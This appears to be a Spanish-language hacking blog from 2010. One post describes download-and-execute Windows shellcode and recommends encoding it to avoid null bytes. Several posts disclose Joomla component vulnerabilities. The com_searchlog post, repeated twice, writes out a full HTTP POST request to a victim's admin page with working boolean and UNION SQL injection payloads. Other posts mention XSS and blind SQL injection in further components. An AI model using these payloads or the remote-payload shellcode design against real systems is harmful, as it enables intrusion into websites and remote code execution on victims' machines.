Buenas a todos.
Este es un posible código fuente, más bien del montón, para un shellcode que descarga un fichero desde un host remoto, lo ejecuta y sale del proceso.
El código calcula la longitudd el nombre del archivo, para mas tarde sumarsela como desplazamiento a un CALL para corregir la distancia a la que se encuentra, que varía con la longitud del nombre del archivo que queremos descargar.
Mas tarde consigue los desplazamientos de memoria en los que esta situada la URL y el nombre del archivo a descargar, los almacena , procede a llamar a las APIs que se encargan de todo.
Aquí lo tenéis (UPDATED: EXPLOIT-DB aquí), para masm32, seguramente pueda reducirse bastante su tamaño:
Si observáis los opcodes habrá multitud de bytes nulos jeje así que recomiendo encodear la shellcode antes de usarla, y acoplarle alguna rutina de descifrado que se ejecute antes que la shellcode, claro...
-H4ppyH4ck1n9-
miércoles, 23 de junio de 2010
sábado, 5 de junio de 2010
Joomla Component com_searchlog SQL Injection
Vulnerabilidad en com_searchlog, pronto en exploit-db. Un adelanto del post ;) :
(ACTUALIZADO: post aqui)
http://VICTIM/administrator/index.php?option=com_searchlog&act=log
POST /administrator/index.php?option=com_searchlog&act=log HTTP/1.1
Host: VICTIM
Content-Type: application/x-www-form-urlencoded
Content-Length: xxx
search=[SQLi]
&sort=calls&limit=20&limitstart=0&option=com_searchlog&act=log&task=&callbase=1&boxchecked=1&hidemainmenu=0
Where [SQLi] = someLogExisting') and 1=1# => true
someLogExisting') and 1=2# => false
UNION SQLi = someLogExisting') union select 1,2,3,4,5,6,7,8#
-H4ppyH4ck1n9-
(ACTUALIZADO: post aqui)
http://VICTIM/administrator/index.php?option=com_searchlog&act=log
POST /administrator/index.php?option=com_searchlog&act=log HTTP/1.1
Host: VICTIM
Content-Type: application/x-www-form-urlencoded
Content-Length: xxx
search=[SQLi]
&sort=calls&limit=20&limitstart=0&option=com_searchlog&act=log&task=&callbase=1&boxchecked=1&hidemainmenu=0
Where [SQLi] = someLogExisting') and 1=1# => true
someLogExisting') and 1=2# => false
UNION SQLi = someLogExisting') union select 1,2,3,4,5,6,7,8#
-H4ppyH4ck1n9-
viernes, 4 de junio de 2010
Joomla Component com_djartgallery Multiple Vulnerabilities
Buenas noches, este componente contiene un XSS en la administracion, y ademas tambien puede ser explotado con Blind SQL Injection, aquí teneis el link.
-H4ppyH4ck1n9-
-H4ppyH4ck1n9-
jueves, 3 de junio de 2010
Joomla Component com_jsjobs SQL Injection Vulnerability
SQL Injection debido a la ausencia de saneado de la variable 'cid', aqui teneis el post.
-H4ppyH4ck1n9-
-H4ppyH4ck1n9-
Suscribirse a:
Entradas (Atom)